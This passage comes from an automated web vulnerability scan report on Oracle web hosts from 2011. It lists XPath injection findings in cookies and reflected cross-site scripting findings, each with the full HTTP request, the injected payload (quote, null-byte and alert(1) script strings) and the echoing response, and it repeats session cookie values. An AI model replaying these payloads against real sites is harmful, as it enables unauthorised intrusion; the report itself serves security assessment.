// FileTy
...[SNIP]...
ATION_LEVEL1 = document.implementation && document.implementation.hasFeature;
SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;
SSAjax.HAS_DOM_XPATH_LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");

//***************************************************************************
//***************
...[SNIP]...

2.14. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_pers cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/sitestudio/ssajax/ssajax.js

Issue detail

The s_pers cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_pers cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B'; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 08:17:27 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:32 GMT
ETag: "69640c-6a3a-4af51fa379100"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=27;ecid=49937449198776511,0:1)
Content-Length: 27194

/////////////////////////////////////////////////////////////////////////////
//
// Solution : SiteStudio
// Project : Site Studio Ajax Library (SSAjax)
//
// FileName : ssajax.js
// FileTy
...[SNIP]...
ATION_LEVEL1 = document.implementation && document.implementation.hasFeature;
SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;
SSAjax.HAS_DOM_XPATH_LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");

//***************************************************************************
//***************
...[SNIP]...

2.15. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_sess cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/sitestudio/ssajax/ssajax.js

Issue detail

The s_sess cookie appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the s_sess cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B%00'; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 08:17:27 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:32 GMT
ETag: "69640c-6a3a-4af51fa379100"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=28;ecid=49937573752829502,0:1)
Content-Length: 27194

/////////////////////////////////////////////////////////////////////////////
//
// Solution : SiteStudio
// Project : Site Studio Ajax Library (SSAjax)
//
// FileName : ssajax.js
// FileTy
...[SNIP]...
ATION_LEVEL1 = document.implementation && document.implementation.hasFeature;
SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;
SSAjax.HAS_DOM_XPATH_LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");

//***************************************************************************
//***************
...[SNIP]...

2.16. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_sq cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/sitestudio/ssajax/ssajax.js

Issue detail

The s_sq cookie appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the s_sq cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON%00'

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 08:23:05 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:32 GMT
ETag: "69640c-6a3a-4af51fa379100"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=115;ecid=49715983505137825,0:1)
Content-Length: 27194

/////////////////////////////////////////////////////////////////////////////
//
// Solution : SiteStudio
// Project : Site Studio Ajax Library (SSAjax)
//
// FileName : ssajax.js
// FileTy
...[SNIP]...
ATION_LEVEL1 = document.implementation && document.implementation.hasFeature;
SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;
SSAjax.HAS_DOM_XPATH_LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");

//***************************************************************************
//***************
...[SNIP]...

2.17. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_wgw_lv cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://crmondemand.oracle.com
Path:   /ocom/resources/sitestudio/ssajax/ssajax.js

Issue detail

The s_wgw_lv cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_wgw_lv cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /ocom/resources/sitestudio/ssajax/ssajax.js HTTP/1.1
Host: crmondemand.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://crmondemand.oracle.com/en/index.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912'; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 10:09:57 GMT
Last-Modified: Sat, 15 Oct 2011 08:15:32 GMT
ETag: "69640c-6a3a-4af51fa379100"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Language: en
Connection: Close
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=21;ecid=49401561834281059,0:1)
Content-Length: 27194

/////////////////////////////////////////////////////////////////////////////
//
// Solution : SiteStudio
// Project : Site Studio Ajax Library (SSAjax)
//
// FileName : ssajax.js
// FileTy
...[SNIP]...
ATION_LEVEL1 = document.implementation && document.implementation.hasFeature;
SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL2 = document.implementation && document.implementation.createDocument;
SSAjax.HAS_DOM_XPATH_LEVEL3 = SSAjax.HAS_DOM_IMPLEMENTATION_LEVEL1 && document.implementation.hasFeature("XPath", "3.0");

//***************************************************************************
//***************
...[SNIP]...

3. Cross-site scripting (reflected)  previous  next
There are 16 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. https://campus.oracle.com/campus/HR/us-profile-direct.jsp [flag parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile-direct.jsp

Issue detail

The value of the flag request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4972f"%3balert(1)//fcb5f1357c2 was submitted in the flag parameter. This input was echoed as 4972f";alert(1)//fcb5f1357c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /campus/HR/us-profile-direct.jsp?flag=04972f"%3balert(1)//fcb5f1357c2 HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile_mobile.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:37:12 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28057

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"
...[SNIP]...
<script language="javascript" type="text/javascript">

if("04972f";alert(1)//fcb5f1357c2"=="1")
{
alert("Your application is successfully received.");
}
else
{

}

function validate()
{
var fname = document.forms[0].fname1.value;
var lname = document.forms[0].lname1.value;
va
...[SNIP]...

3.2. https://campus.oracle.com/campus/HR/us-upload-file.jsp [flag parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-upload-file.jsp

Issue detail

The value of the flag request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45f62"%3balert(1)//dfdbea669a6 was submitted in the flag parameter. This input was echoed as 45f62";alert(1)//dfdbea669a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /campus/HR/us-upload-file.jsp?flag=045f62"%3balert(1)//dfdbea669a6 HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile_mobile.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:37:06 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Length: 2796
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-885
...[SNIP]...
<script language="javascript" type="text/javascript">

if("045f62";alert(1)//dfdbea669a6"=="1")
{
alert("Your application is successfully received.");
}
else
{

}


function checkname(fname)
{

var msg = "";
var flag = 0;

fname=fname.toLowerCase();

if(fname!=null)
{

...[SNIP]...

3.3. https://cloud.oracle.com/mycloud/wwv_flow.accept [p_md5_checksum parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cloud.oracle.com
Path:   /mycloud/wwv_flow.accept

Issue detail

The value of the p_md5_checksum request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7de15"><script>alert(1)</script>f63bfb69bab was submitted in the p_md5_checksum parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /mycloud/wwv_flow.accept HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
Content-Length: 436
Cache-Control: max-age=0
Origin: https://cloud.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://cloud.oracle.com/mycloud/f?p=service2:notify_me:0:::1::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWV_PUBLIC_SESSION_5001=3598503052462700; ORACLE_CLOUD=C883817E0FE44F56; WWV_PUBLIC_SESSION_5003=1479613243090993; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815714959; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A1%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

p_flow_id=5003&p_flow_step_id=1&p_instance=1479613243090993&p_page_submission_id=9442049033674&p_request=CREATE&p_arg_names=77163203970299379&p_t01=xss&p_arg_names=77163411158299380&p_t02=xss&p_arg_na
...[SNIP]...
g_names=77163016753299379&p_t04=xss&p_arg_names=77162817151299379&p_t05=US&p_arg_names=77163813569299380&p_arg_names=77161232145299376&p_t07=nqyy&p_arg_names=77161423188299376&p_t08=xs&p_md5_checksum=7de15"><script>alert(1)</script>f63bfb69bab

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 19604
Date: Mon, 17 Oct 2011 01:45:33 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:45:35 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...
<input type="hidden" name="p_md5_checksum" value="7de15"><script>alert(1)</script>f63bfb69bab" />
...[SNIP]...

3.4. http://events.oracle.com/search/search [keyword parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.oracle.com
Path:   /search/search

Issue detail

The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20445"-alert(1)-"da812faca7f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/search?group=Events&keyword=OPN+Only20445"-alert(1)-"da812faca7f HTTP/1.1
Host: events.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Language: en
X-Oracle-DMS-ECID: 992113526294652
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.4.0 (M;max-age=900+0;age=1;ecid=992113526294652,0:1)
Date: Mon, 17 Oct 2011 02:33:25 GMT
Content-Length: 32275
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xml:lang="en" xmlns="http://www.w3
...[SNIP]...
aginationCount = recencyHits;
var pageHitCount = 10;
var username = "";
var hitCountqueryList = new Array();
var sort = "";
var isEmptyResult = false;
queryString = "group=Events&keyword=OPN+Only20445"-alert(1)-"da812faca7f";
datagroup = "Events";
recencyHits = "200";
paginationCount = recencyHits;
pageHitCount = "10";
sort = "date_asc";
isEmptyResult = true;
</script>
...[SNIP]...

3.5. http://events.oracle.com/search/search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.oracle.com
Path:   /search/search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af082"-alert(1)-"d619d29c89f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

